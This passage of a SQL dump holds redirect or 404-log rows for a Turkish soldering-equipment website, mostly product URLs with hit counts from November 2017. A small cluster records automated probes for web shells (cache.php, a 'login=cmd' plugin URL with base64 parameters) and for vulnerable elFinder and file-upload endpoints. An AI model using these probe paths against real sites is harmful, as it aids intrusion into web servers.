00:00:00',301),(10795,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/k_fl_250x250.png',NULL,'','',1,0,'2017-11-10 12:40:51','0000-00-00 00:00:00',301),(10796,'http://www.3s-technologies.com.tr/tr/component/content/category?format=feed&type=atom',NULL,'','',7,0,'2017-11-10 12:49:11','0000-00-00 00:00:00',301),(10797,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/results,1-50',NULL,'','',5,0,'2017-11-10 12:49:19','0000-00-00 00:00:00',301),(10798,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,ordering?language=en-gb',NULL,'','',17,0,'2017-11-10 12:55:46','0000-00-00 00:00:00',301),(10799,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/ls60v-detail',NULL,'','',241,0,'2017-11-10 12:59:38','0000-00-00 00:00:00',301),(10800,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-10 13:09:03','0000-00-00 00:00:00',301),(10801,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim',NULL,'','',45,0,'2017-11-10 13:09:38','0000-00-00 00:00:00',301),(10802,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-11-10 13:13:15','0000-00-00 00:00:00',301),(10803,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/avb-detail',NULL,'','',48,0,'2017-11-10 13:14:39','0000-00-00 00:00:00',301),(10804,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',559,0,'2017-11-10 13:17:20','0000-00-00 00:00:00',301),(10805,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/ly-8c-detail',NULL,'','',237,0,'2017-11-10 13:19:40','0000-00-00 00:00:00',301),(10806,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',202,0,'2017-11-10 13:19:50','0000-00-00 00:00:00',301),(10807,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',213,0,'2017-11-10 13:22:05','0000-00-00 00:00:00',301),(10808,'http://www.3s-technologies.com.tr/tr/urunler/avb-detail?tmpl=component&print=1',NULL,'','',34,0,'2017-11-10 13:29:48','0000-00-00 00:00:00',301),(10809,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/avb-detail',NULL,'','',11,0,'2017-11-10 13:35:08','0000-00-00 00:00:00',301),(10810,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın?language=tr-tr',NULL,'','',1,0,'2017-11-10 13:37:01','0000-00-00 00:00:00',301),(10811,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın',NULL,'','',611,0,'2017-11-10 13:40:07','0000-00-00 00:00:00',301),(10812,'http://3s-technologies.com.tr/en/products/ess-310-24-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-10 13:44:48','0000-00-00 00:00:00',301),(10813,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/avb-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-10 13:45:09','0000-00-00 00:00:00',301),(10814,'http://www.3s-technologies.com.tr/en/products/avb-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-10 13:50:17','0000-00-00 00:00:00',301),(10815,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/asp-300-detail',NULL,'','',46,0,'2017-11-10 13:55:18','0000-00-00 00:00:00',301),(10816,'http://www.3s-technologies.com.tr/tr/urunler/manufacturers/aqueous',NULL,'','',68,0,'2017-11-10 13:56:27','0000-00-00 00:00:00',301),(10817,'http://3s-technologies.com.tr/en/products/2.-el-makineler/avb-detail',NULL,'','',22,0,'2017-11-10 14:05:40','0000-00-00 00:00:00',301),(10818,'http://3s-technologies.com.tr/tr/urunler/screen-printer/asp-300-detail',NULL,'','',27,0,'2017-11-10 14:10:35','0000-00-00 00:00:00',301),(10819,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,mf_name?language=en-gb',NULL,'','',15,0,'2017-11-10 14:12:47','0000-00-00 00:00:00',301),(10820,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/asp-300-detail',NULL,'','',2,0,'2017-11-10 14:15:38','0000-00-00 00:00:00',301),(10821,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avb-detail',NULL,'','',14,0,'2017-11-10 14:15:38','0000-00-00 00:00:00',301),(10822,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/asp-300-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-10 14:25:48','0000-00-00 00:00:00',301),(10823,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/dirdesc',NULL,'','',53,0,'2017-11-10 14:27:48','0000-00-00 00:00:00',301),(10824,'http://www.3s-technologies.com.tr/tr/urunler/ls60v-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-10 14:40:59','0000-00-00 00:00:00',301),(10825,'http://3s-technologies.com.tr/libraries/import.php:info',NULL,'3s-technologies.com.tr','',2,0,'2017-11-10 14:49:39','0000-00-00 00:00:00',301),(10826,'http://3s-technologies.com.tr/administrator/index.php:info',NULL,'3s-technologies.com.tr','',2,0,'2017-11-10 14:50:54','0000-00-00 00:00:00',301),(10827,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/results,1-50',NULL,'','',4,0,'2017-11-10 14:50:58','0000-00-00 00:00:00',301),(10828,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-10 14:55:05','0000-00-00 00:00:00',301),(10829,'http://3s-technologies.com.tr/libraries/cms.php:info',NULL,'3s-technologies.com.tr','',2,0,'2017-11-10 14:56:09','0000-00-00 00:00:00',301),(10830,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',204,0,'2017-11-10 15:11:17','0000-00-00 00:00:00',301),(10831,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',236,0,'2017-11-10 15:16:18','0000-00-00 00:00:00',301),(10832,'http://3s-technologies.com.tr/index.php/en/products/flux/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',10,0,'2017-11-10 15:18:45','0000-00-00 00:00:00',301),(10833,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-10 15:19:00','0000-00-00 00:00:00',301),(10834,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar',NULL,'','',22,0,'2017-11-10 15:24:50','0000-00-00 00:00:00',301),(10835,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',22,0,'2017-11-10 15:25:41','0000-00-00 00:00:00',301),(10836,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae',NULL,'','',20,0,'2017-11-10 15:25:51','0000-00-00 00:00:00',301),(10837,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo',NULL,'','',23,0,'2017-11-10 15:25:55','0000-00-00 00:00:00',301),(10838,'http://3s-technologies.com.tr/en/products/2.-el-makineler/jvk-detail',NULL,'','',32,0,'2017-11-10 15:26:10','0000-00-00 00:00:00',301),(10839,'http://3s-technologies.com.tr/en/products/dalga-lehim/lfs-1-detail',NULL,'','',33,0,'2017-11-10 15:26:18','0000-00-00 00:00:00',301),(10840,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',593,0,'2017-11-10 15:31:38','0000-00-00 00:00:00',301),(10841,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic',NULL,'','',1,0,'2017-11-10 15:34:22','0000-00-00 00:00:00',301),(10842,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/panasonic',NULL,'','',14,0,'2017-11-10 15:35:59','0000-00-00 00:00:00',301),(10843,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/dirdesc',NULL,'','',1,0,'2017-11-10 15:36:00','0000-00-00 00:00:00',301),(10844,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',1,0,'2017-11-10 15:36:00','0000-00-00 00:00:00',301),(10845,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_sku',NULL,'','',4,0,'2017-11-10 15:36:04','0000-00-00 00:00:00',301),(10846,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',2,0,'2017-11-10 15:36:08','0000-00-00 00:00:00',301),(10847,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_sku',NULL,'','',4,0,'2017-11-10 15:36:12','0000-00-00 00:00:00',301),(10848,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name',NULL,'','',4,0,'2017-11-10 15:36:14','0000-00-00 00:00:00',301),(10849,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-10 15:36:22','0000-00-00 00:00:00',301),(10850,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/mx200lp-detail',NULL,'','',1,0,'2017-11-10 15:36:33','0000-00-00 00:00:00',301),(10851,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/ls60v-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-10 15:37:19','0000-00-00 00:00:00',301),(10852,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/avf-detail',NULL,'','',56,0,'2017-11-10 15:41:48','0000-00-00 00:00:00',301),(10853,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/ly-8c-detail',NULL,'','',4,0,'2017-11-10 15:46:48','0000-00-00 00:00:00',301),(10854,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-10 15:49:36','0000-00-00 00:00:00',301),(10855,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/ly-8c-detail?tmpl=component&print=1',NULL,'','',6,0,'2017-11-10 16:01:57','0000-00-00 00:00:00',301),(10856,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',563,0,'2017-11-10 16:07:07','0000-00-00 00:00:00',301),(10857,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name',NULL,'','',38,0,'2017-11-10 16:15:30','0000-00-00 00:00:00',301),(10858,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name/results,1-50',NULL,'','',1,0,'2017-11-10 16:17:18','0000-00-00 00:00:00',301),(10859,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,product_name',NULL,'','',1,0,'2017-11-10 16:21:38','0000-00-00 00:00:00',301),(10860,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/trident-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-10 16:22:58','0000-00-00 00:00:00',301),(10861,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',1,0,'2017-11-10 16:28:27','0000-00-00 00:00:00',301),(10862,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,mf_name',NULL,'','',10,0,'2017-11-10 16:32:31','0000-00-00 00:00:00',301),(10863,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name',NULL,'','',4,0,'2017-11-10 16:37:48','0000-00-00 00:00:00',301),(10864,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',240,0,'2017-11-10 16:42:48','0000-00-00 00:00:00',301),(10865,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/jv131-detail',NULL,'','',30,0,'2017-11-10 16:46:08','0000-00-00 00:00:00',301),(10866,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/avb-detail',NULL,'','',14,0,'2017-11-10 16:48:01','0000-00-00 00:00:00',301),(10867,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/results,1-5',NULL,'','',6,0,'2017-11-10 17:03:20','0000-00-00 00:00:00',301),(10868,'http://www.3s-technologies.com.tr/tr/register.html',NULL,'','',15,0,'2017-11-10 17:04:57','0000-00-00 00:00:00',301),(10869,'http://www.3s-technologies.com.tr/tr/log-out?view=registration',NULL,'','',11,0,'2017-11-10 17:04:58','0000-00-00 00:00:00',301),(10870,'http://www.3s-technologies.com.tr/tr/loggin.html?view=registration',NULL,'','',15,0,'2017-11-10 17:04:58','0000-00-00 00:00:00',301),(10871,'http://www.3s-technologies.com.tr/tr/registration-form',NULL,'','',30,0,'2017-11-10 17:05:00','0000-00-00 00:00:00',301),(10872,'http://www.3s-technologies.com.tr/tr/register-for-access',NULL,'','',15,0,'2017-11-10 17:05:03','0000-00-00 00:00:00',301),(10873,'http://www.3s-technologies.com.tr/tr/user-profile?view=registration',NULL,'','',56,0,'2017-11-10 17:05:06','0000-00-00 00:00:00',301),(10874,'http://www.3s-technologies.com.tr/tr/create-an-account',NULL,'','',11,0,'2017-11-10 17:05:12','0000-00-00 00:00:00',301),(10875,'http://www.3s-technologies.com.tr/tr/users/registration',NULL,'','',15,0,'2017-11-10 17:05:13','0000-00-00 00:00:00',301),(10876,'http://www.3s-technologies.com.tr/tr/profile?view=registration',NULL,'','',15,0,'2017-11-10 17:05:14','0000-00-00 00:00:00',301),(10877,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',62,0,'2017-11-10 17:08:38','0000-00-00 00:00:00',301),(10878,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',51,0,'2017-11-10 17:13:38','0000-00-00 00:00:00',301),(10879,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/avf-detail',NULL,'','',1,0,'2017-11-10 17:21:22','0000-00-00 00:00:00',301),(10880,'http://3s-technologies.com.tr/tr/urunler/asp-300-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-10 17:22:33','0000-00-00 00:00:00',301),(10881,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',235,0,'2017-11-10 17:54:18','0000-00-00 00:00:00',301),(10882,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/rh2-20-detail',NULL,'','',50,0,'2017-11-10 17:59:27','0000-00-00 00:00:00',301),(10883,'http://www.3s-technologies.com.tr/tr/urunler/manufacturers/tolo',NULL,'','',60,0,'2017-11-10 18:01:52','0000-00-00 00:00:00',301),(10884,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',240,0,'2017-11-10 18:04:29','0000-00-00 00:00:00',301),(10885,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-10 18:07:53','0000-00-00 00:00:00',301),(10886,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/ly-8c-detail',NULL,'','',375,0,'2017-11-10 18:08:14','0000-00-00 00:00:00',301),(10887,'http://3s-technologies.com.tr/en/products/thru-hole',NULL,'','',42,0,'2017-11-10 18:09:25','0000-00-00 00:00:00',301),(10888,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim',NULL,'','',151,0,'2017-11-10 18:14:47','0000-00-00 00:00:00',301),(10889,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-10 18:14:51','0000-00-00 00:00:00',301),(10890,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri',NULL,'','',29,0,'2017-11-10 18:23:44','0000-00-00 00:00:00',301),(10891,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/dirdesc',NULL,'','',29,0,'2017-11-10 18:35:16','0000-00-00 00:00:00',301),(10892,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jv131_250x250.jpg',NULL,'','',4,0,'2017-11-10 18:44:29','0000-00-00 00:00:00',301),(10893,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-50',NULL,'','',6,0,'2017-11-10 19:26:07','0000-00-00 00:00:00',301),(10894,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',434,0,'2017-11-10 19:35:34','0000-00-00 00:00:00',301),(10895,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-10 19:41:17','0000-00-00 00:00:00',301),(10896,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-10 19:46:08','0000-00-00 00:00:00',301),(10897,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/results,1-5',NULL,'','',5,0,'2017-11-10 19:51:18','0000-00-00 00:00:00',301),(10898,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10',NULL,'','',3,0,'2017-11-10 19:56:27','0000-00-00 00:00:00',301),(10899,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/panasonic?tmpl=component',NULL,'','',2,0,'2017-11-10 19:57:28','0000-00-00 00:00:00',301),(10900,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',569,0,'2017-11-10 20:01:26','0000-00-00 00:00:00',301),(10901,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-5',NULL,'','',1,0,'2017-11-10 20:06:27','0000-00-00 00:00:00',301),(10902,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-11-10 20:16:16','0000-00-00 00:00:00',301),(10903,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20',NULL,'','',4,0,'2017-11-10 20:16:37','0000-00-00 00:00:00',301),(10904,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/kester?tmpl=component',NULL,'','',1,0,'2017-11-10 20:18:31','0000-00-00 00:00:00',301),(10905,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-50',NULL,'','',7,0,'2017-11-10 20:26:47','0000-00-00 00:00:00',301),(10906,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',23,0,'2017-11-10 20:38:11','0000-00-00 00:00:00',301),(10907,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-50',NULL,'','',6,0,'2017-11-10 20:47:13','0000-00-00 00:00:00',301),(10908,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',559,0,'2017-11-10 20:56:31','0000-00-00 00:00:00',301),(10909,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-20',NULL,'','',1,0,'2017-11-10 20:57:16','0000-00-00 00:00:00',301),(10910,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-detail',NULL,'','',8,0,'2017-11-10 20:59:48','0000-00-00 00:00:00',301),(10911,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku?language=en-gb',NULL,'','',5,0,'2017-11-10 21:03:37','0000-00-00 00:00:00',301),(10912,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',224,0,'2017-11-10 21:11:35','0000-00-00 00:00:00',301),(10913,'http://3s-technologies.com.tr/tr/urunler/lfs-1-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-10 21:37:51','0000-00-00 00:00:00',301),(10914,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-10',NULL,'','',5,0,'2017-11-10 21:53:03','0000-00-00 00:00:00',301),(10915,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/275-k100-1mm-28-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-10 21:56:27','0000-00-00 00:00:00',301),(10916,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-10 21:58:07','0000-00-00 00:00:00',301),(10917,'http://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-41-detail',NULL,'','',45,0,'2017-11-10 22:03:17','0000-00-00 00:00:00',301),(10918,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-28-detail',NULL,'','',3,0,'2017-11-10 22:19:09','0000-00-00 00:00:00',301),(10919,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-10 22:35:27','0000-00-00 00:00:00',301),(10920,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın',NULL,'','',260,0,'2017-11-10 22:43:57','0000-00-00 00:00:00',301),(10921,'http://3s-technologies.com.tr/index.php/tr/component/content/article/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',9,0,'2017-11-10 22:49:09','0000-00-00 00:00:00',301),(10922,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-10 23:01:50','0000-00-00 00:00:00',301),(10923,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name?language=en-gb',NULL,'','',18,0,'2017-11-10 23:02:58','0000-00-00 00:00:00',301),(10924,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/dirdesc',NULL,'','',43,0,'2017-11-10 23:21:12','0000-00-00 00:00:00',301),(10925,'http://www.3s-technologies.com.tr/en/products/thru-hole/av132-detail',NULL,'','',45,0,'2017-11-10 23:24:56','0000-00-00 00:00:00',301),(10926,'http://3s-technologies.com.tr/tr/urunler/ly-8c-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-10 23:26:00','0000-00-00 00:00:00',301),(10927,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim',NULL,'','',123,0,'2017-11-10 23:41:06','0000-00-00 00:00:00',301),(10928,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/av132-detail',NULL,'','',32,0,'2017-11-10 23:42:00','0000-00-00 00:00:00',301),(10929,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim',NULL,'','',70,0,'2017-11-10 23:49:20','0000-00-00 00:00:00',301),(10930,'http://3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',21,0,'2017-11-10 23:50:03','0000-00-00 00:00:00',301),(10931,'http://www.3s-technologies.com.tr/en/products/av132-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-10 23:56:41','0000-00-00 00:00:00',301),(10932,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name',NULL,'','',21,0,'2017-11-11 00:15:34','0000-00-00 00:00:00',301),(10933,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/cache.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-11-11 00:21:58','0000-00-00 00:00:00',301),(10934,'http://www.3s-technologies.com.tr/license.php',NULL,'http://www.3s-technologies.com.tr/license.php','',1,0,'2017-11-11 00:21:58','0000-00-00 00:00:00',301),(10935,'http://www.3s-technologies.com.tr/tr/cache.php',NULL,'http://www.googlebot.com/bot.html','',7,0,'2017-11-11 00:22:25','0000-00-00 00:00:00',301),(10936,'http://www.3s-technologies.com.tr/wp-content/plugins/login-wall-etgfb/login_wall.php?login=cmd&z3=y2fjaguucghw&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.3s-technologies.com.tr','',1,0,'2017-11-11 00:22:25','0000-00-00 00:00:00',301),(10937,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2017-11-11 00:22:26','0000-00-00 00:00:00',301),(10938,'http://www.3s-technologies.com.tr/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'http://www.3s-technologies.com.tr/sites/all/libraries/elfinder/php/connector.minimal.php','',1,0,'2017-11-11 00:22:26','0000-00-00 00:00:00',301),(10939,'http://www.3s-technologies.com.tr//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php','',1,0,'2017-11-11 00:22:34','0000-00-00 00:00:00',301),(10940,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/files/guest/cache.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-11-11 00:22:40','0000-00-00 00:00:00',301),(10941,'http://www.3s-technologies.com.tr//wp-content/plugins/woocommerce-product-options/includes/image-upload.php',NULL,'http://www.3s-technologies.com.tr//wp-content/plugins/woocommerce-product-options/includes/image-upload.php','',1,0,'2017-11-11 00:22:40','0000-00-00 00:00:00',301),(10942,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/cache.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-11-11 00:22:54','0000-00-00 00:00:00',301),(10943,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/av132-detail',NULL,'','',6,0,'2017-11-11 00:40:46','0000-00-00 00:00:00',301),(10944,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name?language=en-gb',NULL,'','',4,0,'2017-11-11 01:17:12','0000-00-00 00:00:00',301),(10945,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-11 01:25:34','0000-00-00 00:00:00',301),(10946,'http://www.3s-technologies.com.tr/en/products/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',37,0,'2017-11-11 01:25:48','0000-00-00 00:00:00',301),(10947,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',338,0,'2017-11-11 01:35:51','0000-00-00 00:00:00',301),(10948,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',334,0,'2017-11-11 01:35:53','0000-00-00 00:00:00',301),(10949,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name',NULL,'','',337,0,'2017-11-11 01:35:56','0000-00-00 00:00:00',301),(10950,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,ordering',NULL,'','',358,0,'2017-11-11 01:35:59','0000-00-00 00:00:00',301),(10951,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name',NULL,'','',362,0,'2017-11-11 01:36:01','0000-00-00 00:00:00',301),(10952,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',373,0,'2017-11-11 01:36:03','0000-00-00 00:00:00',301),(10953,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_sku',NULL,'','',361,0,'2017-11-11 01:36:11','0000-00-00 00:00:00',301),(10954,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',189,0,'2017-11-11 01:36:14','0000-00-00 00:00:00',301),(10955,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/dirdesc',NULL,'','',363,0,'2017-11-11 01:36:18','0000-00-00 00:00:00',301),(10956,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',188,0,'2017-11-11 01:36:22','0000-00-00 00:00:00',301),(10957,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',180,0,'2017-11-11 01:36:24','0000-00-00 00:00:00',301),(10958,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',179,0,'2017-11-11 